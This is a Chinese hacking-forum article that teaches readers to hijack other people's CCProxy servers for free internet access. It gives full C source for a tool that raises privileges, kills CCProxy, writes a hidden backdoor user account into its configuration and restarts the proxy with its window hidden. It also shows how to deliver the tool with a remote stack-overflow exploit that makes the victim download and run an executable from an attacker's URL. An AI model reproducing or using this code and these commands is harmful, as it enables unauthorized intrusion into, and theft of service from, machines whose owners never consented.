文章作者:SunLion[EST](血舞[EST])
信息来源:中国邪恶八进制(
www.EvilOctal.com)
前几天,写了一篇文章,《利用CCProxy漏洞实现免费上网》,文中已经分析完了利用CCProxy缺陷实现上网的原理,其中也公布了一部分代码,但是,里面有不少错误,在这里纠正一下,首先:
“AuthType=2 ---------允许的连接模式的个数”这里解释有点问题,真正是有它代表的意思的:0-------代表“IP地址”验证模式;
1--------代表“MAC地址”验证模式
2---------代表“用户/密码”验证模式
3---------代表“用户/密码+IP地址” 验证模式
4---------代表“用户/密码+MAC地址” 验证模式
5---------代表“IP+MAC地址” 验证模式
在程序的末尾处“fseek(fp,-237L,2);”这里也要修,因为写代码的时候不小心,笔误值得谅解J,应该改为fseek(fp,-236L,2);
好了,错误就纠正到这里;记得那天我已经在文中把CCPXadd.exe这个东西的工作原理都说出来了吧,在这里我就不说了;(以下是代码,在WIN2K+VC6.0环境下编译,在CCProxy6.0测试通过);
其中调用到了两个子函数,void getpath(TCHAR* path);这个就是在[利用CCProxy漏洞实现免费上网]中写的添加帐户的子程序;
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable);这里是提升系统权限的子程序,这段程序用的是风泽[E.S.T]兄弟写的,在此感谢风泽;
在我测试的过程中,在决大多数的电脑里,不需要提升权限就能杀死CCPRoxy,并重新启动,但是在小数的电脑里面就不行了,所以为了安全起见,还是加上提升权限的代码吧;
大家编译出来CCPXadd.exe后想办法放到开有CCProxy.EXE的电脑上运行,那么CCPXadd.exe首先会杀死CCProxy.exe,于是添加帐户,用户名:User-001密码:est ,然后CCPXadd.exe就会重启动CCProxy,并已经隐藏窗体的形式启动;如果CCPROXY没有图片,那么用户将不会发觉,呵呵,可是还是有点遗憾,因为CCPROXY启动动,时都会携同一张图片一起启动,所以用户细心的话还是会有所发现的!
其实当初写这个东西就是为了结和isno大哥,Goldsun写的CCPXdown.exe来使用的,现在我们来介绍一下这个CCPXdown.exe,它远程攻击运行有CCPROXY.EXE的软件,并让其到指定的地址下载一个.EXE,并运行它,假如你把CCPXadd.exe放到
http://www.xxx.com/ccpxadd.exe,那么你运用CCPXdown.exe结合CCPXadd.exe实现免费上网,将是轻而一举的事了,先让我们来看以下:
工具来源:goldsun
CCPROXY 6 Remote Web Request Log Stack Overflow Exploit
Found By isno,Download and Execute Exploit Released By Goldsun
5261314@sohu.com
Usage: ccpxdown <target_ip> <download url> [target_port] [offset]
Default port is 808,Offset=15-IP Length,Download url as: http//
ftp://...
Sample: ccpxdown 192.168.0.1
http://www.goldsun.com/trajon.exe 808
ccpxdown 192.168.0.1
http://www.goldsun.com/trajon.exe 808 2
Test OK On Microsoft Windows 2000/XP/2003 CN
*******上面是我在Xfocus上拿下来的,到这里大家已经会运用了吧!**
CCPXdown.exe下载地址:
http://www.xfocus.net/tools/200410/ccpxdown.exe
CCPXadd.exe下载地址:
http://www.eviloctal.com/weblog/up/1098960741.rar
举个例子:假如你扫描的10.16.9.8开了808端口或1080端口那么估计这台电脑就开了CCPROXY了,因为CCPROXY的默认端口就这个;
ccpxdown.exe 10.16.9.8
http://www.xxx.com/ccpxadd.exe 808
过一会就会提示你成功!那么你就可以使用10.16.9.8代理上网了!
不过在我使用的过程中,CCPXdown.exe一次都没有成功,这个我比较郁闷,如果那位大哥使用过CCPXdown.exe成功的话,别忘记指点我一下哦,小弟我万分感激!所以我在局域内都是用别的方法先进到对方电脑在上传CCPXadd.exe的,这样起来挺麻纺的!
好了,这篇文章就写到这里吧!转载请保留:文章作者:SunLion[EST](血舞[EST])
信息来源:中国邪恶八进制(
www.EvilOctal.com)论坛:
http://www.eviloctal.com/forum/
********************************以下是代码**************************
/*BUG发现:SunLion 程序开发:SunLion*/
/*特别感谢:无锋之刃大哥,BIDEYORE,冰血封情,风泽,等兄弟!*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "Psapi.h"
#pragma comment( linker, "/subsystem:console" )
#pragma comment( lib, "Psapi.lib" )
#define ID_SIZE 100
void getpath(TCHAR* path);
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable);
int main(void)
{
DWORD processid[ID_SIZE];
DWORD needed;
DWORD processcount;
HANDLE hProcess;
HMODULE hModule;
TCHAR path[ID_SIZE];
char path1[ID_SIZE];
char path2[ID_SIZE];
char temp[40];
char* target;
DWORD i,length;
char targ[] = "AccInfo.ini";
char tar[] = "CCProxy.exe";
char end = '\0';
int sunlion=0,est=0;
EnablePrivilege(SE_DEBUG_NAME,TRUE);
EnumProcesses(processid, sizeof(processid), &needed);
processcount = needed/sizeof(DWORD);
for (i = 0; i < processcount; i++)
{
hProcess=OpenProcess(PROCESS_QUERY_INFORMATION |PROCESS_TERMINATE |PROCESS_VM_READ|PROCESS_VM_WRITE,FALSE,processid
);
if (hProcess)
{
EnumProcessModules(hProcess, &hModule, sizeof(hModule), &needed);
GetModuleFileNameEx(hProcess, hModule, path, sizeof(path));
GetShortPathName(path,path,256);
itoa(processid,temp,10);
if((target=strstr(path,"CCProxy.exe")))
{ est=est+1;
TerminateProcess(hProcess,0);
strcpy(path1,path);
strcpy(path2,path);
for(length = 0;path[length]!=end;length++);
path1[length - 11] = '\0';
path2[length - 11] = '\0';
strcat(path1,targ);
strcat(path2,tar);
for(length = 0;path1[length] != end;length++)
{
if (path1[length]=='\\')
path1[length]='\/';
}
for(length = 0;path2[length] != end;length++)
{
if (path2[length]=='\\')
path2[length]='\/';
}
printf("\n%s",path1);
printf("\n%s\n",path2);
getpath(path1);
CloseHandle(hProcess);
}
else
CloseHandle(hProcess);
}
}
printf("\n[+]:程序设计:sunlion[E.S.T] Welcome to E.S.T:http://www.eviloctal.com/forum/");
printf("\n[+]:特别感谢:无锋之刃大哥,BIDEYORE,冰血封情,风泽,等兄弟");
if(est)
{
printf("\n[+]:正在重启动CCProxy.exe请你等待...\n");
Sleep(2000);
if( ShellExecute (NULL,"open",path2,NULL,NULL,SW_HIDE)>(HANDLE) 32)sunlion++;
if(sunlion) printf("\n[+]:祝贺你成功了!你的帐号已经生效!");
else printf("[+]:无法启动CCProxy,只有等对方重启CCProxy,你的帐号才能生效!");
}
else
printf("\n\n\n[+]:error!!!!,对方没有使用CCProxy");
printf("\n[+]:程序9秒后自动关闭自己\n");
Sleep(9000);
//getchar();
return 0;
}
//以下是添加帐户子程序
void getpath(char* path)
{
int c=0,user,model,sun;
FILE*fp;
//clrscr();
if(fp=fopen(path,"r+"))
;
else
exit(1);
while(c!=44)
{
getc(fp);
c++;
if(c==19)
{
user=getc(fp);
sun=user;
}
if(c==41)
{
model=getc(fp);
}
}
if(model>52) model=52;
fseek(fp,20,0);
putc(++user,fp);
fseek(fp,45,0);
putc(++model,fp);
fclose(fp);
if(user-sun==1) printf("[+]:成功添加帐号!\n");
else printf("[+]:error,无法添加帐户");
fp=fopen(path,"r");
c=0;
while(c!=44)
{putchar(getc(fp));
c++;
}
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("[User004]\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("UserName=User-001\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("Password=898884883\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("MACAddress=\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("IPAddressLow=0.0.0.0\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("IPAddressHigh=0.0.0.0\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("ServiceMask=254\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("MaxConn=-1\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("BandWidth=-1\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("WebFilter=-1\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("TimeSchedule=-1\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("EnableUserPassword=1\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("EnableIPAddress=0\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,0,2);
fputs("EnableMACAddress=0\n",fp);
fclose(fp);
fp=fopen(path,"r+");
fseek(fp,-236L,2);
putc(user,fp);
fclose(fp);
}
//以下是提升系统权限子程序
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}
